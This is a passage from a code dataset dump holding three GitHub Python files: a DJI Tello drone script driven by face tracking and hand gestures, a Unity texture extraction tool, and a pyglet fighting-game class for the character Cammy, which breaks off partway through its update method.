fingers.append(0)\n\n totalFingers = fingers.count(1)\n if totalFingers == 1:\n me.takeoff()\n me.send_rc_control(0, 0, 25, 0)\n time.sleep(2)\n print(\"TAKEOFF\")\n elif totalFingers == 3:\n me.land()\n print(\"LANDING\")\n elif totalFingers == 2:\n time.sleep(0.5)\n cv2.imwrite(f'djitellofacetrack/Data/Images/{time.time()}.jpg', img)\n time.sleep(0.5)\n print('screenshoot')\n print(totalFingers)\n\n # print(lmList[4],lmList[8])\n\n # x1, y1 = lmList[4][1],lmList[4][2]\n # x2, y2 = lmList[8][1], lmList[8][2]\n # cx,cy = (x1+x2)//2, (y1+y2) //2\n #\n # # cv2.circle(img, (x1, y1), 15, (255, 0, 255), cv2.FILLED)\n # # cv2.circle(img, (x2, y2), 15, (255, 0, 255), cv2.FILLED)\n # # cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 3)\n # # cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n # # try\n # p1, f1 = lmList[9][1], lmList[9][2]\n # p2, f2 = lmList[12][1], lmList[12][2]\n # px, py = (p1 + p2) // 2, (f1 + f2) // 2\n #\n # # cv2.circle(img, (p1, f1), 15, (255, 0, 255), cv2.FILLED)\n # # cv2.circle(img, (p2, f2), 15, (255, 0, 255), cv2.FILLED)\n # # cv2.line(img, (p1, f1), (p2, f2), (255, 0, 255), 3)\n # # cv2.circle(img, (px, py), 15, (255, 0, 255), cv2.FILLED)\n #\n # length = math.hypot(x2 - x1, y2 - y1)\n # # print(length)\n #\n # length1 = math.hypot(p2 - p1, f2 - f1)\n # # print(length1)\n # if length>30 and length<45:\n # # cv2.circle(img, (cx, cy), 15, (0, 255, 0), cv2.FILLED)\n # # me.takeoff()\n # # me.send_rc_control(0, 0, 25, 0)\n # # time.sleep(2)\n # print(\"TAKEOFF\")\n # elif length>100:\n # # cv2.circle(img, (cx, cy), 15, (0, 255, 0), cv2.FILLED)\n # me.land()\n # print(\"LAND\")\n # elif length1<20:\n # # cv2.circle(img, (cx, cy), 15, (0, 255, 0), cv2.FILLED)\n # time.sleep(0.5)\n # cv2.imwrite(f'djitellofacetrack/Data/Images/{time.time()}.jpg', img)\n # time.sleep(0.5)\n # print('screenshoot')\n\n #FPS\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime = cTime\n cv2.putText(img,f'FPS : {int(fps)}', (20,40), cv2.FONT_HERSHEY_COMPLEX,1,(255,0,0),2)\n\n img, info = findFace(img)\n pError = trackFace(me, info, w, pid, pError)\n print(\"Center\", info[0], \"Area\", info[1])\n cv2.imshow(\"Output\", img)\n #Emergency\n pressedKey = cv2.waitKey(1) & 0xFF\n if pressedKey == ord('e'):\n me.takeoff()\n me.send_rc_control(0, 0, 30, 0)\n time.sleep(2)\n print(\"TAKEOFF\")\n if pressedKey == ord('f'):\n cv2.imwrite(f'djitellofacetrack/Data/Images/{time.time()}.jpg', img)\n print('screenshoot')\n elif pressedKey == ord('q'):\n me.land()\n print(\"LAND\")\n elif pressedKey == ord('x'):\n cv2.destroyAllWindows()\n print(\"see you later :D\")\n break", "repo_name": "Arteewee/djitello-Face-Detector", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 6465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "djitellopy.tello.Tello", "line_number": 9, "usage_type": "call"}, {"api_name": "djitellopy.tello", "line_number": 9, "usage_type": "name"}, {"api_name": "HandTrackingModule.handDetector", "line_number": 15, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "cv2.CASCADE_SCALE_IMAGE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 94, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 95, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 95, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 101, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 126, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 133, "usage_type": "call"}, {"api_name": "time.time", "line_number": 133, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 134, "usage_type": "call"}, {"api_name": "time.time", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 184, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 189, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 191, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 195, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 198, "usage_type": "call"}, {"api_name": "time.time", "line_number": 198, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 204, "usage_type": "call"}]} +{"seq_id": "72204125609", "text": "\"\"\"\nHOW TO USE:\n`python deserialize.py `\n\nREQUIRED DEPENDENCIES:\n- lz4 `pip install lz4`\n- Pillow `pip install Pillow`\n- decrunch `pip install decrunch`\n- UnityPack (provided)\n\"\"\"\n\n\nimport sys\nfrom io import BytesIO\nfrom vendor.UnityPack import unitypack\n\n\ndef open_texture2d(import_path, export_path):\n with open(import_path, 'rb') as f:\n bundle = unitypack.load(f)\n for asset in bundle.assets:\n for id, object in asset.objects.items():\n if object.type == 'Texture2D':\n data = object.read()\n try:\n from PIL import ImageOps\n except ImportError:\n print('ImportError')\n continue\n try:\n image = data.image\n except NotImplementedError:\n print('\\tNotImplementedError')\n continue\n if image is None:\n print('\\tEmpty Image')\n continue\n img = ImageOps.flip(image)\n output = BytesIO()\n img.save(output, format='png')\n\n with open(export_path, 'wb') as fi:\n fi.write(output.getvalue())\n print('', import_path, '->', export_path)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print('Not enough arguments.')\n sys.exit()\n open_texture2d(sys.argv[1], sys.argv[2])\n", "repo_name": "Expugn/pqh-updater", "sub_path": "python-tools/deserialize.py", "file_name": "deserialize.py", "file_ext": "py", "file_size_in_byte": 1588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vendor.UnityPack.unitypack.load", "line_number": 20, "usage_type": "call"}, {"api_name": "vendor.UnityPack.unitypack", "line_number": 20, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 38, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 39, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "42887478279", "text": "import sys, pickle, pyglet, random, time, math\nfrom ball import *\nfrom champion import Champion\n\n\ndef preload_image(image):\n img = pyglet.image.load(\"sprites/\" + image + \".png\")\n return img\n\nclass Cammy(Champion):\n def __init__(self, name):\n super().__init__(name)\n self.defualtSpeed = .3\n self.frameSpeed = .3\n self.oldSpeed = 0\n self.hitBoxOffset = -40\n self.x = 0\n self.gameStart = True\n self.slideDirection = 0 \n\n self.pos = [0,0,0]\n \n self.defualt2 = [name+\"_mirror\", name+\"_2_mirror\"]\n\n self.width, self.height = (79, 79)\n self.hitBox = [0,0, 30,30]\n self.body = [30,0,50,85]\n self.shadowOffset = [50,-5]\n self.alignmentOffset = [20,0]\n \n\n #Vairations\n self.variation_images = [pyglet.sprite.Sprite(preload_image(\"Cammy/variation_A\")), pyglet.sprite.Sprite(preload_image(\"Cammy/variation_B\"))]\n self.variation_names = [\"Renegade\", \"Commando\"]\n self.variation_description = [self.variation_names[0] + \": Cammy gains 'Brutal Strike' crippling her opponents by reducing their damage dealt by a certain amount\",\n self.variation_names[1] + \": Cammy has access to multiple command grabs. You can style with this by slipping them into a combo\"]\n\n #Biography\n self.main_description = [\"Cammy, uses her strong body and flexibility to counter and supress her opponents.\",\n \"She has multiple skills that mixes up with other of her abilities. She also has a \",\n \"hand full of command grabs and can parry opponents easily\"]\n \n self.description = \"\"\n\n for d in self.main_description:\n self.description += d\n \n #Dialogues\n self.talkTo = []\n self.respondTo = []\n\n #Projectiles\n self.spawnFrame = 0\n self.balls = []\n self.vfx = []\n\n #Dialogues\n self.talkTo = [[\"Ken\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"], [\"Ken\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/B.wav\"],\n [\"Ken\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"], [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"],\n [\"M.Bison\", \"G\", \"Audio/Champs/\"+self.name+\"/Dialogues/G.wav\"], [\"Ryu\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"],\n [\"Ryu\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/B.wav\"], [\"Cammy\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"],\n [\"Ryu\", \"D\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"], [\"Akuma\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"],\n [\"Anti-Ryu\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"], [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"],\n [\"Anti-Ryu\", \"I\", \"Audio/Champs/\"+self.name+\"/Dialogues/I.wav\"]]\n \n self.respondTo = [[\"Ryu\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"], [\"Ryu\", \"F\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"Ken\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/I.wav\"], [\"Ken\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"],\n [\"Ken\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/G.wav\"], [\"Ken\", \"C\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"Ken\", \"C\", \"Audio/Champs/\"+self.name+\"/Dialogues/F.wav\"], [\"Ken\", \"D\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"],\n [\"Ken\", \"D\", \"Audio/Champs/\"+self.name+\"/Dialogues/G.wav\"], [\"Ken\", \"D\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"], [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/E.wav\"],\n [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/L.wav\"], [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/C.wav\"],\n [\"M.Bison\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/E.wav\"], [\"M.Bison\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/J.wav\"],\n [\"M.Bison\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/E.wav\"], [\"M.Bison\", \"G\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"M.Bison\", \"J\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"], [\"M.Bison\", \"J\", \"Audio/Champs/\"+self.name+\"/Dialogues/C.wav\"],\n [\"M.Bison\", \"J\", \"Audio/Champs/\"+self.name+\"/Dialogues/K.wav\"], [\"M.Bison\", \"M\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"M.Bison\", \"M\", \"Audio/Champs/\"+self.name+\"/Dialogues/M.wav\"], [\"M.Bison\", \"O\", \"Audio/Champs/\"+self.name+\"/Dialogues/O.wav\"],\n [\"M.Bison\", \"O\", \"Audio/Champs/\"+self.name+\"/Dialogues/L.wav\"], [\"Cammy\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/B.wav\"],\n [\"Cammy\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/G.wav\"], [\"Anti-Ryu\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"Anti-Ryu\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"], [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/J.wav\"],\n [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/L.wav\"], [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/O.wav\"],\n [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"], [\"Anti-Ryu\", \"G\", \"Audio/Champs/\"+self.name+\"/Dialogues/L.wav\"],\n [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/P.wav\"]]\n\n #Combination\n self.skill = [[\"bfA\", \"Spin Knuckle\"], [\"bfSK\", \"Cannon Drill\"], [\"dbK\", \"Leg Suplex\"], [\"dfSK\", \"Shun' Po\"],\n [\"fbSK\", \"Super Cannon Drill\"]]\n\n \n #Audio\n self.voiceFrame = 0\n self.sound = pyglet.media.load(\"Audio/Champs/Ryu/dragon_ball.wav\", streaming=False)\n self.voiceCD = 0\n self.wins= [[\"First_Wins\", [\"Audio/Champs/\"+self.name+\"/Wins/first_win.wav\"]],[\"End_Game\", [\"Audio/Champs/\"+self.name+\"/Wins/end_gameA.wav\",\n \"Audio/Champs/\"+self.name+\"/Wins/end_gameB.wav\",\n \"Audio/Champs/\"+self.name+\"/Wins/end_gameC.wav\",\n \"Audio/Champs/\"+self.name+\"/Wins/end_gameD.wav\"]],\n [\"Low_Health_Win\", [\"Audio/Champs/Ryu/Wins/low_health_win.wav\"]]]\n \n self.championTaunt = {\"M.Bison\": self.LoadAllFilesFromDirectory(\"Audio/Champs/\"+self.name+\"/Wins/M.Bison\"),\n\n \"Ken\": self.LoadAllFilesFromDirectory(\"Audio/Champs/\"+self.name+\"/Wins/Ken\")}\n \n\n ################ Animations ###############\n #Standing\n self.frames1 = [0, 0, 1, 2, 3, 3, 4]\n #Walking\n self.frames2 = [5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10]\n #Weak Punch\n self.frames3 = [35, 36, 36, 35]\n #Medium Punch\n self.frames4 = [35, 37, 37, 37, 35]\n #Strong Punch A\n self.frames15 = [40, 40, 38, 38, 38, 39]\n #Strong Punch B\n self.frames19 = [40, 40, 41]\n #Strong Punch C\n self.frames26 = [42, 43, 43, 44]\n #Crouch\n self.frames7 = [16]\n #Crouch Weak Punch\n self.frames8 = [17, 18, 18, 17]\n #Crouch Medium Punch\n self.frames9 = [20, 21, 21, 21, 22, 22, 22, 22, 23, 23]\n #Jump\n self.frames10 = [12, 13, 13, 13, 13, 13, 13, 13, 14]\n #Land\n self.frames11 = [15, 16, 16]\n #Getting Hit\n self.frames12 = [123, 123, 123, 123, 123]\n #Getting Hit\n self.frames13 = [127, 127, 127, 127, 127]\n #Getting Hit\n self.frames14 = [128, 128, 128, 128, 128, 128, 128, 128]\n #Falling Bounce\n self.frames16 = [132, 132, 132, 133]\n #Lying\n self.frames17 = [134, 134, 134, 134, 134, 134, 134, 134, 134, 134]\n #Back Spring\n self.frames17B = [134, 134, 134, 134, 109, 109, 114, 114, 115, 115, 116, 116, 117, 117]\n #Weak Kick\n self.frames20 = [49, 50, 50]\n #Medium Kick\n self.frames21 = [51, 52, 52, 53, 53, 53]\n #Crouch Weak Kick\n self.frames22 = [24, 25, 25, 24]\n #Crouch Medium Kick \n self.frames23 = [30, 30, 31, 32, 33, 34, 30, 30]\n #Cannon Drill(Start)\n self.frames24 = [79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 80, 81]\n #Cannon Drill(Mid)\n self.frames25A = [82, 83, 84, 85, 86, 87]\n #Cannon Drill(End)\n self.frames25B = [88, 89, 89]\n self.frames25C = [93, 93, 94, 94, 95, 95, 95]\n self.freezeInAir = False\n self.kickLoop = 5\n #Spin Knuckle(Start)\n self.frames27 = [96, 96, 97, 97, 98]\n #Spin Knuckle(Air)\n self.frames40 = [98, 99, 98, 99, 98, 99]\n #Spin Knuckle(End)\n self.frames41 = [100, 101, 102, 102, 103]\n #Command Grab (Start)\n self.grabChain = 19.1\n self.frames42 = [42, 43, 43, 44, 44, 44]\n #Command Grab A(Start)\n self.frames43 = [15, 15, 15, 118]\n #Command Grab A(Caught)\n self.frames44 = [118, 119, 119, 120, 120, 121, 121]\n\n\n \n #Blocking Frames\n self.frames29 = [45, 46, 47, 48]\n self.frames29B = [61, 61, 61, 61, 61, 61, 61, 62, 64, 64, 64]\n self.blockWait = 0\n\n \n #Win - To - Sub Animation Win\n self.frames30 = [96, 96, 96, 96]\n #Sub Animation Win\n self.frames31 = [136, 137, 138, 138, 138, 139]\n #Sub Animation Win 2A\n self.frames32 = [75, 76, 77, 78]\n #Sub Animation Win 2A (Loop)\n self.frames33 = [41]\n \n #Brutal Strike\n self.frames34 = [110, 110, 110, 110, 110, 110, 110, 110, 110, 111, 112, 112, 112, 113]\n self.frames34_forcesX = [0, 0, 0, 0, 0, 0, 5, 0, 0, 4, 0, 5, 5, 4]\n self.frames34_forcesY = [0, 0, 0, 0, 0, 0, 16, 16, 16, 8, 16, 0, 8, 0]\n\n #Start Game (Dialogues)\n #Respond from taunt\n self.frames35 = [0]\n #Idle Response\n self.frames35B = [143, 143, 143, 144, 144, 144, 143, 143, 143, 144,144, 144, 143, 143, 143,\n 144, 144, 144, 143, 143, 143, 144, 144, 144, 143, 143, 143]\n #Taunt\n self.frames36 = [138, 138, 137, 137, 136, 136, 135, 135]\n #Taunt IDLE\n self.frames36B = [138, 138, 138, 138, 138, 138, 138, 138, 138, 138]\n \n #Throw (Catching)\n self.frames37 = [43, 44, 44, 44]\n #Throw (Caught)\n self.frames38 = [44, 104, 104, 104, 105, 105, 105, 106, 106, 106, 107, 107, 107, 108]\n self.catchFrames = [23, 23.3, 23.3, 23.3, 23.3, 23.3, 23.3, 23.8, 23.8, 23.8, 23.8, 23.8, 23.8, 23.8]\n #Throw (Getting Caught)\n self.frames39 = [128, 127, 126, 132]\n\n #Shun' Po (Start)\n self.frames45 = [61, 62, 63, 64, 64, 64, 63, 62, 61]\n #Shun' Po -> Air Attack (Leap) -> Punch\n self.frames45B = [110, 110, 110, 122]\n #Shun' Po -> Air Attack (First) -> Punch\n self.frames45C = [67, 68, 68, 69, 69]\n #Shun' Po -> Air Attack (Second) -> Punch\n self.frames45D = [70, 71, 71, 72, 72, 72, 67]\n\n #Shun' Po\n #Shun' Po -> Air Attack (First) -> Kick\n self.frames46 = [75, 75, 76, 76, 77, 77, 78, 78, 78]\n #Shun' Po -> Air Attack (Second) -> Kick\n self.frames46B = [73, 74, 74, 75, 75, 13]\n\n #character frames\n self.cell = []\n self.flip = []\n self.targetCell = self.cell\n self.targetFrame = self.frames1\n self.row = 0\n self.col = 0\n self.sounds = [\"sounds/020.wav\"]\n self.sndTimer = 1\n self.frame = 0\n self.direction = 1\n self.dvx = 0\n self.dvy = 0\n \n def _jump(self):\n if not self.jump:\n self.jump = True\n self.vel[1] = self.jumpHeight\n self.frame = 0\n self.Play(\"Audio/jump.wav\")\n self.action = -1\n self.targetFrame = self.frames10\n \n def _height(self):\n if not self.jump:\n self.jump = True\n self.vel[1] = self.jumpHeight\n\n def _skill(self, skill):\n self.mixup = \"\"\n #Leg Suplex\n if skill == \"Leg Suplex\" and self.stamina > 40:\n if self.state == \"Grounded\" or self.state == \"Crouch\":\n self.stamina -= 40\n self.state = \"Skill\"\n self.action = 19\n self.frame = 0\n self.grabChain = 19.1\n\n #Cannon Drill\n if skill == \"Cannon Drill\" or skill == \"Super Cannon Drill\":\n if skill == \"Cannon Drill\" and self.rageBar >= 200:\n if self.state == \"Grounded\" or self.state == \"Crouch\" or self.state == \"BlockHit\":\n self.rageBar -= 200\n self.state = \"Skill\"\n self.frame = 0\n self.action = 17 \n self.invincible = True \n self.Play(\"Audio/Champs/Ryu/special.wav\")\n choice = random.choice([\"Audio/Champs/Cammy/cannon_drillA.wav\", \"Audio/Champs/Cammy/cannon_drillB.wav\"])\n self.PlayVoice(choice)\n self.superSkill = True\n self.vfx.append(Ball(pos=(self.pos[0] - 20, self.pos[1] - 20), name=\"VFX\", loop=False, destroy=3, width=225, height=225,\n speed=.2, img=\"sprites/special.png\", row=4, col=2))\n if skill == \"Super Cannon Drill\" and self.rageBar >= 0:\n if self.state == \"Grounded\" or self.state == \"Crouch\" or self.state == \"BlockHit\":\n self.rageBar -= 200\n self.state = \"Skill\"\n self.frame = 0\n self.action = 31\n self.invincible = True\n self.Play(\"Audio/Champs/Ryu/special.wav\")\n choice = random.choice([\"Audio/Champs/Cammy/cannon_drillA.wav\", \"Audio/Champs/Cammy/cannon_drillB.wav\"])\n self.PlayVoice(choice)\n self.superSkill = True\n self.vfx.append(Ball(pos=(self.pos[0] - 20, self.pos[1] - 20), name=\"VFX\", loop=False, destroy=3, width=225, height=225,\n speed=.2, img=\"sprites/special.png\", row=4, col=2))\n \n #Spin Knuckle\n if skill == \"Spin Knuckle\" and self.stamina > 50: \n if self.state == \"Grounded\" or self.state == \"Crouch\":\n self.stamina -= 50\n self.state = \"Skill\" \n self.frame = 0\n self.action = 12\n \n #Shun' Po\n if skill == \"Shun' Po\" and self.stamina > 40 and self.targetVariation == self.variation_names[1]: \n if self.state == \"Grounded\" or self.state == \"Crouch\":\n self.stamina -= 40\n self.state = \"Skill\" \n self.frame = 0\n self.action = 30\n\n #Audio\n def Play(self, file):\n self.sound = pyglet.media.load(file, streaming=False)\n self.sound.play()\n\n def Win(self):\n self.action = 20\n \n def Update_Alignment(self):\n #Update Alignment\n self.x = 0\n self.y = 0\n self.attacking_actions = [2, 2.5, 3, 3.5, 9, 10, 10.5, 11, 11.5, 12, 17.3, 12.5, 13, 13.5, 14, 14.5, 19, 21, 22, 30, 31]\n try:\n if self.direction == 1:\n self.x = self.pos[0] + self.alignX[self.targetFrame[int(self.frame)]] + -5\n self.y = self.pos[1] + self.alignY[self.targetFrame[int(self.frame)]]\n \n if self.direction == -1:\n self.x = self.pos[0] - self.alignX[self.targetFrame[int(self.frame)]] + 140\n self.y = self.pos[1] + self.alignY[self.targetFrame[int(self.frame)]]\n except:\n pass\n \n if self.action not in self.attacking_actions:\n self.hitBox[0] = 10000\n self.hitBox[1] = 10000\n \n def Update(self):\n if self.opponent != None:\n if self.oldSpeed == 0:\n self.oldSpeed = self.opponent.frameSpeed\n \n if self.pause <= 0:\n self.frame += self.frameSpeed\n self.hitCD -= .09\n self.key_combo_time += .1\n if self.key_combo_time > 5:\n self.key_combo = \"\"\n \n self.UpdateActions()\n\n self.Check_Combo()\n\n #Updating Combos\n if self.voiceCD > 0:\n self.voiceCD -= .1\n\n #Falling and Jumping\n self.UpdatePhysics()\n\n if self.talking:\n if self.gameStart:\n self.gameStart = False\n self.action = -4\n if self.talking == False:\n if self.gameStart:\n self.gameStart = False\n self.action = -4.5\n\n #Animations\n #Idle\n if self.action == 0:\n self.targetFrame = self.frames1\n if self.frame >= len(self.frames1) - 1:\n self.frame = 0\n\n #Walk\n if self.action == 1:\n self.targetFrame = self.frames2\n if self.frame >= len(self.frames2) - 1:\n self.frame = 0\n\n #Weak Punch\n if self.action == 2:\n self.targetFrame = self.frames3\n if self.frame >= len(self.frames3) - 1:\n self.frame = 0\n self.action = 0\n \n #Weak Punch Crouch\n if self.action == 2.5:\n self.targetFrame = self.frames8\n if self.frame >= len(self.frames8) - 1:\n self.frame = 0\n self.action = 0\n self.state = \"Grounded\"\n\n #Medium Punch\n if self.action == 3:\n self.targetFrame = self.frames4\n if self.frame >= len(self.frames4) - 1:\n self.frame = 0\n self.action = 0\n \n #Medium Punch Crouch\n if self.action == 3.5:\n self.targetFrame = self.frames9\n if self.frame >= len(self.frames9) - 1:\n self.frame = 0\n self.action = 0\n self.state = \"Grounded\"\n \n #Crouch\n if self.action == 4:\n self.targetFrame = self.frames7\n self.force = [0,0]\n if self.frame >= len(self.frames7) - 1:\n self.frame = 0\n \n #Land from Jump\n if self.action == 5:\n self.targetFrame = self.frames11\n self.velocity = 0\n self.state = \"Land\"\n if self.frame <= 1 and self.voiceFrame != 1:\n self.voiceFrame = 1\n self.Play(\"Audio/land.wav\")\n if self.frame >= len(self.frames11) - 1:\n self.action = 0\n self.voiceFrame = 0\n self.state = \"Grounded\"\n self.superSkill = False\n \n #Getting Hit A\n if self.action == 6:\n self.targetFrame = self.frames12\n if self.frame >= len(self.frames12) - 1:\n self.action = 0\n self.state = \"Grounded\"\n \n #Getting Hit B\n if self.action == 6.3:\n self.targetFrame = self.frames13\n if self.frame >= len(self.frames13) - 1:\n self.action = 0\n self.state = \"Grounded\"\n \n #Getting Hit C\n if self.action == 6.5:\n self.targetFrame = self.frames14\n if self.frame >= len(self.frames14) - 1:\n self.action = 0\n self.state = \"Grounded\"\n\n #Breaker\n if self.action == 6.7:\n self.targetFrame = self.frames29B\n if self.frame >= len(self.frames29B) - 1:\n self.action = 0\n self.state = \"Grounded\"\n self.Play(\"Audio/Champs/Cammy/breaker.wav\")\n self.opponent.Get_Hit(attacker=self, damage=0, force=[12,5], typeHit=\"Ground\")\n self.frame = 0\n self.superSkill = False\n self.invincible = False\n \n #Falling\n if self.action == 7:\n self.targetFrame = self.frames16\n if self.frame >= len(self.frames16) - 1:\n self.frame = 0\n \n #Back Spring\n if self.action == 7.5:\n self.targetFrame = self.frames17B\n self.velocity = 0\n self.state = \"Lying\"\n if self.frame >= len(self.frames17B) - 1:\n self.frame = 0\n self.action = 0\n self.state = \"Grounded\"\n \n #Lying\n if self.action == 7.9:\n self.targetFrame = self.frames17\n self.velocity = 0\n self.state = \"Lying\"\n self.vel = [0,0]\n if self.hitCombo > 0:\n self.comboEnd = True\n self.damageDealt = 0\n if self.frame >= len(self.frames17) - 1:\n self.frame = 0\n if self.health > 0:\n self.action = 5\n if self.backSpring:\n self.action = 7.5\n self.backSpring = False\n else:\n self.alive = False\n\n #Weak Kick\n if self.action == 10:\n self.targetFrame = self.frames20\n if self.frame >= len(self.frames20) - 1:\n self.frame = 0\n self.action = 0\n \n #Weak Kick Crouch\n if self.action == 10.5:\n self.targetFrame = self.frames22\n if self.frame >= len(self.frames22) - 1:\n self.frame = 0\n self.action = 0\n self.state = \"Grounded\"\n\n #Medium Kick\n if self.action == 11:\n self.targetFrame = self.frames21\n if self.frame >= len(self.frames21) - 1:\n self.frame = 0\n self.action = 0\n \n #Medium Kick Crouch\n if self.action == 11.5:\n self.targetFrame = self.frames23\n if self.frame >= len(self.frames23) - 1:\n self.frame = 0\n self.velocity = 0\n self.state = \"Grounded\"\n self.action = 0\n self.slideDirection = 0\n self.force = [0,0]\n \n #Spin Knuckle(Start)\n if self.action == 12:\n self.targetFrame = self.frames27\n if self.frame >= len(self.frames27) - 1:\n self.Play(\"Audio/jump.wav\")\n self.action = 12.5\n self.jumpHeight = 6\n self._height()\n self.frame = 0\n \n #Spin Knuckle(Mid)\n if self.action == 12.5:\n if self.frame < 1 and self.voiceFrame != -1:\n self.invincible = True\n choice = random.choice([\"Audio/Champs/Cammy/spin_knuckle.wav\", \"Audio/Champs/Cammy/Grunt/51e.wav\",\n \"Audio/Champs/Cammy/Grunt/52e.wav\"])\n self.PlayVoice(choice)\n self.voiceFrame = -1\n self.force = [7.2,5]\n self.damage = 30\n self.vel[0] = -3\n self.targetFrame = self.frames40\n if self.frame >= len(self.frames40) - 1:\n self.voiceFrame = 0\n self.frame = 0\n \n #Spin Knuckle(End)\n if self.action == 12.8:\n self.targetFrame = self.frames41\n if self.frame < 1 and self.voiceFrame != -1:\n self.Play(\"Audio/land.wav\")\n self.voiceFrame = -1\n if self.frame >= len(self.frames41) - 1:\n self.velocity = 0\n self.action = 0\n self.voiceFrame = 0\n self.force = [0,0]\n self.state = \"Grounded\"\n self.invincible = False\n \n #Stand Block (Normal)\n if self.action == 13:\n self.targetFrame = self.frames29\n self.frame = 0\n self.blockWait += 1\n if self.blockWait >= 20:\n self.action = 0\n self.blockWait = 0\n self.blockRight = False\n self.blockLeft = False\n if self.moveRight:\n self.right = True\n if self.moveLeft:\n self.left = True\n \n #Stand Block (Hit)\n if self.action == 13.5:\n self.targetFrame = self.frames29\n self.frame = 1\n self.blockWait += 1\n self.state = \"BlockHit\"\n if self.blockWait >= 10:\n self.action = 13\n self.blockWait = 0\n self.state = \"Grounded\"\n \n #Crouch Block (Normal)\n if self.action == 14:\n self.targetFrame = self.frames29\n self.frame = 2\n self.blockWait += 1\n self.state = \"Crouch\"\n if self.blockWait >= 10:\n self.action = 4\n self.blockWait = 0\n self.blockRight = False\n self.blockLeft = False\n if self.moveRight:\n self.right = True\n 